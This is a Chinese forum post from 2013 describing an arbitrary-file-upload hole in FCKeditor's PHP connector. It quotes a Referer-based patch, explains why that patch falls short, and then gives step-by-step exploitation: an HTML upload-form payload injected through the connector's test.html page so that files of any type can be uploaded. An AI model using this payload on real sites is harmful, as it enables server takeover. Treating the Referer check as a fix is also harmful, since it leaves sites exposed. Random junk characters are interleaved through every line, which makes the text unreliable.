漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php4 R0 E- I7 J3 h9 U" @: E
网上给出的修复方案是; |! ~) l S2 t
修复方法,删除FCK编辑器用其他的编辑器
" H% l0 r$ K Z" p) H8 @或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件3 g8 ?& @! N# f7 e: }% N( y4 v* k
在
% i! d5 M/ W# q; T+ m& \6 }require(‘config.php’);6 u: s+ n/ U1 m0 y8 n3 R7 s" {
require(‘util.php’);
; W K) i8 B* O/ W5 K" m" x+ }的下面添加以下代码—————————–
! ]3 d0 X: R i$ v. P//防止外部提交
4 l' H' J+ Q( h* U" Ufunction outsidepost()
6 L' F. w; Z! r, d% F [# y{
8 N: B3 t# Z5 S& e) W; P2 L" v$servername=$_SERVER['SERVER_NAME'];
& v4 m+ \/ L9 c4 Z3 L2 z' G. R- Q$sub_from=@$_SERVER['HTTP_REFERER'];
/ ^( a9 w8 s8 t; Q$sub_len=strlen($servername);2 a4 O, y* _. f8 t3 c, y: F5 P
$checkfrom=substr($sub_from,7,$sub_len);1 n. x7 K) q! I
if($checkfrom!=$servername){: f y5 P' X8 q
echo(“you don’t outsidepost!”);
6 N9 j# a% x, jexit;
. p# B, q5 a; Z3 H% n; Q, ~ P" ~! P}
( Q3 g" @/ X- f c7 M& H}
+ H* s. j+ i; I) _. \6 s: goutsidepost();
( I) G5 m: D* v) M9 M; G防止外部提交,但是没有防止内部提交,/ a* Y) e) |% l3 r
利用方法:
% v. Z9 X/ S" S7 s0 t1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
1 k( g$ O! o: P; z: B2,在Current Folder 框输入1 { s* d2 m* v; T- U
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
' l% O6 j& _4 y& A3 c: ?9 {* i然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。' g, ~1 x7 Y$ v; x; R/ O* `
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对